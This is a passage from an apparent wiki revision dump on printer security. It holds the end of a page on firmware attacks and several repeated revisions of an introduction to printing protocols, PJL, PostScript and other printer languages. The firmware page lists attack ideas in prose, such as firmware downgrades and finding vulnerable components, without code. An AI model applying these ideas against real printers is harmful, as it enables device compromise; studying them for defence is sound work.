a digital signature is verfified by the printer. Finding the difference is not always easy, and writing malicious firmware with a correct checksum can be a time-consuming project. ''Other attack scenarios include:'' * Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version, which has known security weaknesses. * Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easly mountable). * Just because firmware is signed doesn't mean its secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547]. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 18aa3e47810ab4164f9b9fd3a93f7fa3e5419254 0 19 627 330 2017-06-25T11:20:27Z Admin 1 wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript. → ''Related articles:'' [[Attack carriers]] == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Fundamentals#Printer_Control_Languages|Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface. → ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]] == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]]. → ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]] == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. → ''Related articles:'' [[PCL]], [[PostScript]] ----------- 4ad2ae4d9bdeb6fdb644265a4e1389fde0c94f96 330 296 2017-01-31T15:47:37Z Admin 1 wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript. → ''Related articles:'' [[Attack carriers]] == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface. → ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]] == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]]. → ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]] == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. → ''Related articles:'' [[PCL]], [[PostScript]] ----------- 6c8f8879efe9d3e0ab144c88701ba0c8878e57f2 296 295 2017-01-31T07:43:29Z 84.153.135.37 0 /* Page Description Languages */ wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript. == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface. → ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]] == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]]. → ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]] == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. → ''Related articles:'' [[PCL]], [[PostScript]] ----------- 05d5d2fbdcb011484a5c3f3bf94ad663be8e9a69 295 294 2017-01-31T07:43:20Z 84.153.135.37 0 /* Printer Control Languages */ wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript. == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface. → ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]] == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]]. → ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]] == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. → ''Related aricles:'' [[PCL]], [[PostScript]] ----------- d4a6c331c842c29cc708b056ca2bc80c8340dd10 294 272 2017-01-31T07:43:07Z 84.153.135.37 0 /* Network printing protocols */ wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript. == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface. → ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]] == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]]. → ''Related aricles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]] == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. → ''Related aricles:'' [[PCL]], [[PostScript]] ----------- 8944541b3918f2d52207e36114691e497074343a 272 63 2017-01-28T16:44:26Z Admin 1 wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript. == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface. → ''Related aricles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]] == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]]. → ''Related aricles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]] == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]]. → ''Related aricles:'' [[PCL]], [[PostScript]] ----------- 11a3122678de0fbf8eada24190e0546e8f332df5 63 62 2017-01-08T15:24:03Z Admin 1 wikitext text/x-wiki Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages. == High-level overview == Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below. [[File:Protocols.png|500px|Encapsulation of printer languages]] The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript. == Network printing protocols == Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface. → ''Related aricles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]] == Printer Control Languages == A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]]. → ''Related aricles:'' [[PJL]], [[PML]], [[SNMP]] == Page Description Languages == A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or 